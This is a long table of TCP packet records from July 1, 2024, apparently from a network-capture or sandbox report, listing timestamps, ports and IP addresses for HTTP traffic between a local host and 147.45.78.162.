Jul 1, 2024 13:02:11.292835951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.292869091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.294774055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.294837952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.294843912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.294855118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.294883013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.295020103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.295032024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.295072079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.295245886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.295257092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.295267105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.295290947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.295306921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.299082994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299160957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299171925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299341917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299462080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299473047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299484015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299493074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299818993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299832106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299843073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.299853086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.300225973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.300242901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.300254107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.300262928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.301569939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.301657915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302040100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302088976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302108049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302118063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302155972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302311897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302321911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302336931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302351952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302357912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302376986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302401066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.302676916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.302723885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.303385973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303433895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.303478003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303489923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303523064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.303687096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303698063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303738117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.303884029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303894997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.303934097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321319103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321398020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321548939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321561098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321594954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321614027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321624041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321640015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321662903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321697950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321854115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321871996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321882963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321892977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321901083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321909904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.321919918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.321947098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.322491884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.322503090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.322514057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.322529078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.322541952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.322551012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.322557926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.322601080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.344688892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.344782114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.344794035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.344805956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.345072031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.345082998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.345093966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.345093966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.345103025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.345125914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.345160961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.345458984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.345499992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.351660013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351722002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351732016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351810932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.351924896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351937056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351948023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351959944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.351982117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.352003098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.352396011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.352441072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.355854034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.355918884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.355941057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.355966091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.356074095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.356086016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.356115103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.356134892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.356369019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.356379986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.356390953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.356431007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.359958887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366449118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366547108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366554976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366566896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366595984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366616964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366786003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366821051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366897106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366906881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366919994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366929054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.366935968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366955996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.366986990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370383978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370444059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370461941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370471001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370496035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370513916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370645046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370656013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370683908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370701075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370866060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370877028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370887995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.370898008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.370924950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.371141911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.371176958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.377810001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.377865076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.377885103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.377895117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.377919912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.377935886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.378108025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.378118992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.378130913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.378142118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.378149033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.378164053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.378190041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.378613949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.378657103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.379729986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.379780054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.379834890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.379846096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.379873037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.379893064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.380099058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.380110025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.380143881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.380155087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.380340099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.380350113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.380383968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383413076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383460999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383503914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383513927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383542061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383671045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383682013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383708954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383727074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383861065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383892059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383902073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.383910894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.383932114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.386857033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.386883020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.386893988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.386912107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.386926889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.387128115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.387144089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.387155056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.387167931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.387193918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.387382030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.387392044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.387425900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.389206886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389250994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.389322996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389332056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389365911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.389465094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389476061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389487028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389504910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.389520884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.389729977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389741898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.389770031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.393661022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393707991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.393726110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393735886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393774986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.393887043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393899918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393910885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393923044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.393934011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.393954992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.394273043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394311905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.394372940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394382954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394392014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394418955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.394440889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.394661903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394673109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394681931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394692898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.394709110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.394732952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.395040035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.395080090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.396603107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396666050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.396687031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396699905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396727085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.396898985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396940947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.396970987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396981001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.396991968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.397000074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.397011042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.397038937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.398066998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398113966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.398144007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398154020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398183107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.398406029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398415089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398426056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398437023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.398447990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.398468018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.415798903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.415852070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.415858984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.415884972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.415899992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.415932894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416074991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416085958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416096926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416109085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416135073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416503906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416515112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416527033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416547060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416563988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416899920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416910887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416924000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.416948080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.416975975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.417284012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.417294025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.417305946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.417332888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.417362928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439410925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439466953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439579964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439590931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439634085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439641953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439650059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439659119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439670086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439677000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.439682961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439699888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.439728022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.440135956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.440184116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.446388960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.446441889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.446485996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.446497917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.446532965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.446549892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.446762085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.446773052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.446813107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.489373922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.494196892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.688983917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689013004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689026117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689104080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689152956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689263105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689274073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689285994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689296961 CEST	80	49705	147.45.78.162	192.168.2.5
